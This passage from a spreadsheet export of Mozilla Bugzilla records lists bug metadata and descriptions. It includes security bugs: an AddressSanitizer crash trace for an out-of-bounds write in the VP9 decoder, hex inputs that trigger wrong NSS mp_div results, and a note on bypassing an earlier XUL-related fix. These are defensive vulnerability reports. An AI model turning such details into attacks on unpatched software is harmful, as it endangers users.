https://github.com/mozilla/treeherder-ui/search?p=1&amp;q=thNotify.send&amp;utf8=%E2%9C%93
I will put this up as a good first bug for tapesh in channel.</t>
        </is>
      </c>
      <c r="X6157" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6158">
      <c r="A6158" t="n">
        <v>1063327</v>
      </c>
      <c r="B6158" t="inlineStr">
        <is>
          <t>2014-09-04 20:16:29 -0700</t>
        </is>
      </c>
      <c r="C6158" t="inlineStr">
        <is>
          <t>OOB write in get_tile</t>
        </is>
      </c>
      <c r="D6158" t="inlineStr">
        <is>
          <t>2024-05-30 08:36:59 -0700</t>
        </is>
      </c>
      <c r="E6158" t="n">
        <v>1</v>
      </c>
      <c r="F6158" t="n">
        <v>1</v>
      </c>
      <c r="G6158" t="n">
        <v>3</v>
      </c>
      <c r="H6158" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6158" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6158" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K6158" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6158" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6158" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6158" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6158" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6158" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q6158" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6158" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6158" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T6158" t="n">
        <v>1</v>
      </c>
      <c r="U6158" t="n">
        <v>0</v>
      </c>
      <c r="V6158" t="n">
        <v>29</v>
      </c>
      <c r="W6158" t="inlineStr">
        <is>
          <t>Created attachment 8484739
Testcase (webm depedency coming in next comment)
=================================================================
==24164==ERROR: AddressSanitizer: SEGV on unknown address 0x62efc607675c (pc 0x7fd5dda2a9a8 bp 0x7fd5b61c89a0 sp 0x7fd5b61c7500 T32)
    #0 0x7fd5dda2a9a7 in vp9_decode_frame media/libvpx/vp9/decoder/vp9_decodframe.c:51:3
    #1 0x7fd5dda36d0d in vp9_receive_compressed_data media/libvpx/vp9/decoder/vp9_onyxd_if.c:348:13
    #2 0x7fd5ddb04aa8 in vp9_decode media/libvpx/vp9/vp9_dx_iface.c:349:9
    #3 0x7fd5ddb06586 in vpx_codec_decode media/libvpx/vpx/src/vpx_decoder.c:127:11
    #4 0x7fd5daac6fb6 in mozilla::WebMReader::DecodeVideoFrame(bool&amp;, long) content/media/webm/WebMReader.cpp:916:9
    #5 0x7fd5da7e0074 in mozilla::MediaDecoderReader::RequestVideoData(bool, long) content/media/MediaDecoderReader.cpp:167:10
    #6 0x7fd5da896b98 in nsRunnableMethodImpl&lt;void (mozilla::MediaDecoderStateMachine::*)(), void, true&gt;::Run() objdir-ff-asan/content/media/../../dist/include/nsThreadUtils.h:388:7
    #7 0x7fd5da871b12 in mozilla::MediaTaskQueue::Runner::Run() content/media/MediaTaskQueue.cpp:194:3
    #8 0x7fd5d500747a in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:220:7
    #9 0x7fd5d5007a3c in non-virtual thunk to nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:234:1
    #10 0x7fd5d4ffdc0a in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:823:7
    #11 0x7fd5d5071e92 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #12 0x7fd5d5ca75d7 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:326:20
    #13 0x7fd5d5c348b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:229:3
    #14 0x7fd5d4ff7b9b in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:350:5
    #15 0x7fd5e62ac780 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212:5
    #16 0x7fd5ea9dbf6d in start_thread /build/buildd/eglibc-2.17/nptl/pthread_create.c:311
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV ??:0 ??
Thread T32 (Media Decode #2) created by T31 (Media Decode #1) here:
    #0 0x43a1be in __interceptor_pthread_create _asan_rtl_
    #1 0x7fd5e62a949f in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7fd5e62a901a in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7fd5d4ff9d3d in nsThread::Init() xpcom/threads/nsThread.cpp:455:19
    #4 0x7fd5d50039c3 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:269:17
    #5 0x7fd5d5005a06 in nsThreadPool::PutEvent(nsIRunnable*) xpcom/threads/nsThreadPool.cpp:101:3
    #6 0x7fd5d5007ff0 in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) xpcom/threads/nsThreadPool.cpp:261:5
    #7 0x7fd5da872129 in mozilla::MediaTaskQueue::Runner::Run() content/media/MediaTaskQueue.cpp:225:19
    #8 0x7fd5d500747a in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:220:7
    #9 0x7fd5d5007a3c in non-virtual thunk to nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:234:1
    #10 0x7fd5d4ffdc0a in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:823:7
    #11 0x7fd5d5071e92 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #12 0x7fd5d5ca75d7 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:326:20
    #13 0x7fd5d5c348b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:229:3
    #14 0x7fd5d4ff7b9b in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:350:5
    #15 0x7fd5e62ac780 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212:5
    #16 0x7fd5ea9dbf6d in start_thread /build/buildd/eglibc-2.17/nptl/pthread_create.c:311
Thread T31 (Media Decode #1) created by T30 (Media S~hine #1) here:
    #0 0x43a1be in __interceptor_pthread_create _asan_rtl_
    #1 0x7fd5e62a949f in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7fd5e62a901a in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7fd5d4ff9d3d in nsThread::Init() xpcom/threads/nsThread.cpp:455:19
    #4 0x7fd5d50039c3 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:269:17
    #5 0x7fd5d5005a06 in nsThreadPool::PutEvent(nsIRunnable*) xpcom/threads/nsThreadPool.cpp:101:3
    #6 0x7fd5d5007ff0 in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) xpcom/threads/nsThreadPool.cpp:261:5
    #7 0x7fd5da8704ab in mozilla::MediaTaskQueue::DispatchLocked(mozilla::TemporaryRef&lt;nsIRunnable&gt;, mozilla::MediaTaskQueue::DispatchMode) content/media/MediaTaskQueue.cpp:53:17
    #8 0x7fd5da7e1045 in mozilla::MediaTaskQueue::Dispatch(mozilla::TemporaryRef&lt;nsIRunnable&gt;) content/media/MediaTaskQueue.cpp:34:10
    #9 0x7fd5da808273 in mozilla::MediaDecoderStateMachine::EnqueueDecodeMetadataTask() content/media/MediaDecoderStateMachine.cpp:1569:17
    #10 0x7fd5da80f494 in mozilla::MediaDecoderStateMachine::RunStateMachine() content/media/MediaDecoderStateMachine.cpp:2356:14
    #11 0x7fd5da819d5a in mozilla::MediaDecoderStateMachineScheduler::TimeoutExpired(int) content/media/MediaDecoderStateMachineScheduler.cpp:160:10
    #12 0x7fd5d500747a in nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:220:7
    #13 0x7fd5d5007a3c in non-virtual thunk to nsThreadPool::Run() xpcom/threads/nsThreadPool.cpp:234:1
    #14 0x7fd5d4ffdc0a in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:823:7
    #15 0x7fd5d5071e92 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #16 0x7fd5d5ca75d7 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:326:20
    #17 0x7fd5d5c348b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:229:3
    #18 0x7fd5d4ff7b9b in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:350:5
    #19 0x7fd5e62ac780 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:212:5
    #20 0x7fd5ea9dbf6d in start_thread /build/buildd/eglibc-2.17/nptl/pthread_create.c:311
Thread T30 (Media S~hine #1) created by T0 here:
    #0 0x43a1be in __interceptor_pthread_create _asan_rtl_
    #1 0x7fd5e62a949f in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:453:14
    #2 0x7fd5e62a901a in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:544:12
    #3 0x7fd5d4ff9d3d in nsThread::Init() xpcom/threads/nsThread.cpp:455:19
    #4 0x7fd5d50039c3 in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:269:17
    #5 0x7fd5d5005a06 in nsThreadPool::PutEvent(nsIRunnable*) xpcom/threads/nsThreadPool.cpp:101:3
    #6 0x7fd5d5007ff0 in nsThreadPool::Dispatch(nsIRunnable*, unsigned int) xpcom/threads/nsThreadPool.cpp:261:5
    #7 0x7fd5da818f22 in mozilla::MediaDecoderStateMachineScheduler::Schedule(long) content/media/MediaDecoderStateMachineScheduler.cpp:129:10
    #8 0x7fd5da7bc84b in mozilla::MediaDecoder::ScheduleStateMachineThread() content/media/MediaDecoderStateMachine.cpp:3001:10
    #9 0x7fd5da7c068a in mozilla::MediaDecoder::InitializeStateMachine(mozilla::MediaDecoder*) content/media/MediaDecoder.cpp:572:10
    #10 0x7fd5da53c88a in mozilla::dom::HTMLMediaElement::FinishDecoderSetup(mozilla::MediaDecoder*, mozilla::MediaResource*, nsIStreamListener**, mozilla::MediaDecoder*) content/html/content/src/HTMLMediaElement.cpp:2674:17
    #11 0x7fd5da51e39f in mozilla::dom::HTMLMediaElement::InitializeDecoderForChannel(nsIChannel*, nsIStreamListener**) content/html/content/src/HTMLMediaElement.cpp:2624:12
    #12 0x7fd5da51ce0a in mozilla::dom::HTMLMediaElement::MediaLoadListener::OnStartRequest(nsIRequest*, nsISupports*) content/html/content/src/HTMLMediaElement.cpp:350:7
    #13 0x7fd5d52167a4 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) netwerk/base/src/nsBaseChannel.cpp:737:14
    #14 0x7fd5d52691c6 in nsInputStreamPump::OnStateStart() netwerk/base/src/nsInputStreamPump.cpp:531:14
    #15 0x7fd5d52679d4 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:433:25
    #16 0x7fd5d4fb078f in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:88:9
    #17 0x7fd5d4ffdc0a in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:823:7
    #18 0x7fd5d5071e92 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/glue/nsThreadUtils.cpp:265:10
    #19 0x7fd5d5ca50a4 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:99:21
    #20 0x7fd5d5c348b0 in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:229:3
    #21 0x7fd5d9ced0f2 in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:164:3
    #22 0x7fd5dd40d242 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:280:19
    #23 0x7fd5dd543979 in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:4101:10
    #24 0x7fd5dd544a92 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:4172:8
    #25 0x7fd5dd545a2c in XRE_main toolkit/xre/nsAppRunner.cpp:4386:16
    #26 0x4bdedd in main browser/app/nsBrowserApp.cpp:282:12
    #27 0x7fd5e9a03de4 in __libc_start_main /build/buildd/eglibc-2.17/csu/libc-start.c:260</t>
        </is>
      </c>
      <c r="X6158" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6159">
      <c r="A6159" t="n">
        <v>1190248</v>
      </c>
      <c r="B6159" t="inlineStr">
        <is>
          <t>2015-08-02 21:09:15 -0700</t>
        </is>
      </c>
      <c r="C6159" t="inlineStr">
        <is>
          <t>mp_div and mp_exptmod sometimes produce wrong calculation results</t>
        </is>
      </c>
      <c r="D6159" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:00 -0700</t>
        </is>
      </c>
      <c r="E6159" t="n">
        <v>1</v>
      </c>
      <c r="F6159" t="n">
        <v>1</v>
      </c>
      <c r="G6159" t="n">
        <v>3</v>
      </c>
      <c r="H6159" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6159" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J6159" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K6159" t="inlineStr">
        <is>
          <t>3.19.2</t>
        </is>
      </c>
      <c r="L6159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6159" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6159" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6159" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6159" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][b2g-adv-main2.5?][adv-main44+][adv-esr38.8+] see comment 27 for severity</t>
        </is>
      </c>
      <c r="Q6159" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6159" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6159" t="inlineStr">
        <is>
          <t>3.21</t>
        </is>
      </c>
      <c r="T6159" t="n">
        <v>1</v>
      </c>
      <c r="U6159" t="n">
        <v>0</v>
      </c>
      <c r="V6159" t="n">
        <v>58</v>
      </c>
      <c r="W6159" t="inlineStr">
        <is>
          <t>Created attachment 8642239
sample c code showing mpi_div failure
Sometimes calculations with mp_div produce wrong results. An example is this:
0x10000000000000001000000000000000000000 / 0x10000000000000001001
(both numbers are hex)
This should produce
0xFFFFFFFFFFFFFFFFFF
However mp_div will produce
0xFFFFFFFFFFFFFFFFFE
I have attached a sample c code that will show this (compile libmpi.a and then compile with "gcc -I[path_to_freebl] [input] libmpi.a"). It will do a div calculation and then multiply the result with the divisor, add the modulus and then substract the original dividend. If the calculation would be correct this would always result in zero, no matter what the input values were.
While mp_div is not exposed via the nss api it is used within several crypto functions (rsa, dsa, diffie hellman), so this may have severe security impacts.
Here are some other values that will also result in wrong results:
801C4D3A9DE4691ADDBFC7D2D2DE2DA7114125A77FECE17FDA204B73FA3CDA4FF783AEE4453952BEF81DF7A9114125A700
801C4D3A9DE4691ADDBFC7D2D2DE2DA7114125A7CEF66E9B76BAC1
B7B7B7B7B7B7B7B7B7B7B7939393939393939393939393939393B7B7B7B7B7B70080FFFFC1B7BAB70001B7
B7B7B7B7B7B7B7B7B7B7C1B7BAB7DE00648B
BFC7D2E66986FFFCE1B4D2DEF82CBEF80000FADACE4B73F710AED25E000004001DE9BEF81DE91DE9A9556301F7A9551C
BFC7D2E66986FFFCE1B4D2DEF82CBEF81DE9A9556301F7A9551CBFC7D2E46986FFFCE1B4D2BAC1
I found these issues by comparing the results of openssl's bignum functions with the ones from nss. I then ran afl and fuzzed the inputs.</t>
        </is>
      </c>
      <c r="X6159" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6160">
      <c r="A6160" t="n">
        <v>1055752</v>
      </c>
      <c r="B6160" t="inlineStr">
        <is>
          <t>2014-08-19 12:33:16 -0700</t>
        </is>
      </c>
      <c r="C6160" t="inlineStr">
        <is>
          <t>[mkt] refresh marketplace stage DB with contents of marketplace production DB</t>
        </is>
      </c>
      <c r="D6160" t="inlineStr">
        <is>
          <t>2014-08-20 13:31:55 -0700</t>
        </is>
      </c>
      <c r="E6160" t="n">
        <v>1</v>
      </c>
      <c r="F6160" t="n">
        <v>1</v>
      </c>
      <c r="G6160" t="n">
        <v>2</v>
      </c>
      <c r="H6160" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6160" t="inlineStr">
        <is>
          <t>Cloud Services</t>
        </is>
      </c>
      <c r="J6160" t="inlineStr">
        <is>
          <t>Operations: Marketplace</t>
        </is>
      </c>
      <c r="K6160" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6160" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6160" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6160" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6160" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6160" t="inlineStr"/>
      <c r="Q6160" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6160" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6160" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6160" t="n">
        <v>1</v>
      </c>
      <c r="U6160" t="n">
        <v>0</v>
      </c>
      <c r="V6160" t="n">
        <v>2</v>
      </c>
      <c r="W6160" t="inlineStr">
        <is>
          <t>Requested by :ddurst
:krupa can I perform this tomorrow Aug 20th @ 6AM PDT?
We need to run after refresh. https://wiki.mozilla.org/User:Clouserw/AMODBrefresh</t>
        </is>
      </c>
      <c r="X6160" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6161">
      <c r="A6161" t="n">
        <v>1843046</v>
      </c>
      <c r="B6161" t="inlineStr">
        <is>
          <t>2023-07-12 05:55:12 -0700</t>
        </is>
      </c>
      <c r="C6161" t="inlineStr">
        <is>
          <t>push notifications saved to disk in Private Browsing mode (Toggle off push notifications in Private Browsing mode)</t>
        </is>
      </c>
      <c r="D6161" t="inlineStr">
        <is>
          <t>2024-05-27 04:46:26 -0700</t>
        </is>
      </c>
      <c r="E6161" t="n">
        <v>1</v>
      </c>
      <c r="F6161" t="n">
        <v>1</v>
      </c>
      <c r="G6161" t="n">
        <v>3</v>
      </c>
      <c r="H6161" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6161" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6161" t="inlineStr">
        <is>
          <t>DOM: Push Subscriptions</t>
        </is>
      </c>
      <c r="K6161" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6161" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6161" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6161" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6161" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6161" t="inlineStr">
        <is>
          <t>[adv-main117+] [adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q6161" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6161" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6161" t="inlineStr">
        <is>
          <t>118 Branch</t>
        </is>
      </c>
      <c r="T6161" t="n">
        <v>1</v>
      </c>
      <c r="U6161" t="n">
        <v>0</v>
      </c>
      <c r="V6161" t="n">
        <v>26</v>
      </c>
      <c r="W6161" t="inlineStr">
        <is>
          <t>As it has surfaced here (https://bugzilla.mozilla.org/show_bug.cgi?id=1823752), notifications store is not encrypted on disk in private browsing mode and it could leak sensitive information. There would be a follow up bug to properly encrypt and lifetime notifications store but for now, we want to disable notifications in PBM.</t>
        </is>
      </c>
      <c r="X6161" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6162">
      <c r="A6162" t="n">
        <v>432591</v>
      </c>
      <c r="B6162" t="inlineStr">
        <is>
          <t>2008-05-07 03:00:48 -0700</t>
        </is>
      </c>
      <c r="C6162" t="inlineStr">
        <is>
          <t>Fix for bug 428672 can be circumvented by using XUL element</t>
        </is>
      </c>
      <c r="D6162" t="inlineStr">
        <is>
          <t>2008-07-02 02:00:06 -0700</t>
        </is>
      </c>
      <c r="E6162" t="n">
        <v>1</v>
      </c>
      <c r="F6162" t="n">
        <v>1</v>
      </c>
      <c r="G6162" t="n">
        <v>3</v>
      </c>
      <c r="H6162" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6162" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6162" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K6162" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6162" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6162" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6162" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6162" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q6162" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6162" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6162" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6162" t="n">
        <v>1</v>
      </c>
      <c r="U6162" t="n">
        <v>0</v>
      </c>
      <c r="V6162" t="n">
        <v>16</v>
      </c>
      <c r="W6162" t="inlineStr">
        <is>
          <t>Instead of &lt;body&gt; element, a XUL element can be used to attach an event handler
to an outer window.</t>
        </is>
      </c>
      <c r="X6162" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6163">
      <c r="A6163" t="n">
        <v>247833</v>
      </c>
      <c r="B6163" t="inlineStr">
        <is>
          <t>2004-06-20 13:36:49 -0700</t>
        </is>
      </c>
      <c r="C6163" t="inlineStr">
        <is>
          <t>Long From/To push window content (incl. scrollbars) out of view</t>
        </is>
      </c>
      <c r="D6163" t="inlineStr">
        <is>
          <t>2015-04-07 13:56:19 -0700</t>
        </is>
      </c>
      <c r="E6163" t="n">
        <v>1</v>
      </c>
      <c r="F6163" t="n">
        <v>1</v>
      </c>
      <c r="G6163" t="n">
        <v>2</v>
      </c>
      <c r="H6163" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6163" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J6163" t="inlineStr">
        <is>
          <t>MailNews: Message Display</t>
        </is>
      </c>
      <c r="K6163" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6163" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6163" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6163" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6163" t="inlineStr"/>
      <c r="Q6163" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6163" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6163" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6163" t="n">
        <v>1</v>
      </c>
      <c r="U6163" t="n">
        <v>15</v>
      </c>
      <c r="V6163" t="n">
        <v>49</v>
      </c>
      <c r="W6163" t="inlineStr">
        <is>
          <t>If there's a long From address, it pushes the Attachments box out of the visible
window area, i.e. the box is cut off at the window border. The rest of the
window stays normal.
If there're long recipient (TO, CC, BCC) addresses, they also push the
attachments box out of the visible window area, but also do the same to the
other parts of the right half of the window, i.e. msg body, thread pane and
throbber.
With my fix for bug 9942, it just causes a horizontal scrollbar (incl. body) in
both cases.
Related to bug 91662, bug 9942, bug 56825.</t>
        </is>
      </c>
      <c r="X6163" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6164">
      <c r="A6164" t="n">
        <v>863192</v>
      </c>
      <c r="B6164" t="inlineStr">
        <is>
          <t>2013-04-18 03:47:19 -0700</t>
        </is>
      </c>
      <c r="C6164" t="inlineStr">
        <is>
          <t>Twitter default page shows "@cache" profile</t>
        </is>
      </c>
      <c r="D6164" t="inlineStr">
        <is>
          <t>2013-04-23 04:36:23 -0700</t>
        </is>
      </c>
      <c r="E6164" t="n">
        <v>1</v>
      </c>
      <c r="F6164" t="n">
        <v>1</v>
      </c>
      <c r="G6164" t="n">
        <v>6</v>
      </c>
      <c r="H6164" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6164" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6164" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6164" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6164" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6164" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6164" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6164" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6164" t="inlineStr">
        <is>
          <t>[apps watch list1][NPOTB], IOT</t>
        </is>
      </c>
      <c r="Q6164" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6164" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6164" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6164" t="n">
        <v>1</v>
      </c>
      <c r="U6164" t="n">
        <v>0</v>
      </c>
      <c r="V6164" t="n">
        <v>23</v>
      </c>
      <c r="W6164" t="inlineStr">
        <is>
          <t>Created attachment 738968
Default @cache profile page
Found in Ikura
gaia commit:
cc0e498 Merge pull request #8186 from jaoo/836257
gecko commit:
2ab9876 Bug 854302 - [Buri][WIFI]Cann't disconnect WIFI when connect AP use WPS. r=mrbkap, a=tef+
When opening Twitter application for the first time, (or every time you open it after killing the app), the default page that user sees is the profile page of a user called "@cache".
My guess is that there is something in the default settings of Twitter application that is referring to "cache" that is causing this.
I have attached a picture of that default profile page
Nominated to tef? and marked as P1</t>
        </is>
      </c>
      <c r="X6164" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6165">
      <c r="A6165" t="n">
        <v>1323773</v>
      </c>
      <c r="B6165" t="inlineStr">
        <is>
          <t>2016-12-15 09:29:21 -0800</t>
        </is>
      </c>
      <c r="C6165" t="inlineStr">
        <is>
          <t>SIGILL crash in mp4parse_capi::mp4parse_new</t>
        </is>
      </c>
      <c r="D6165" t="inlineStr">
        <is>
          <t>2017-01-20 15:14:39 -0800</t>
        </is>
      </c>
      <c r="E6165" t="n">
        <v>1</v>
      </c>
      <c r="F6165" t="n">
        <v>1</v>
      </c>
      <c r="G6165" t="n">
        <v>3</v>
      </c>
      <c r="H6165" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6165" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6165" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K6165" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6165" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6165" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6165" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6165" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6165" t="inlineStr"/>
      <c r="Q6165" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6165" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6165" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T6165" t="n">
        <v>1</v>
      </c>
      <c r="U6165" t="n">
        <v>0</v>
      </c>
      <c r="V6165" t="n">
        <v>24</v>
      </c>
      <c r="W6165" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-c0d43287-b39c-422c-8609-d63c52161215.
=============================================================
This is only on two installs on Nightly, but it happened a few times for each, all Android. The first crashes are on the 12-12 build.</t>
        </is>
      </c>
      <c r="X6165" t="n">
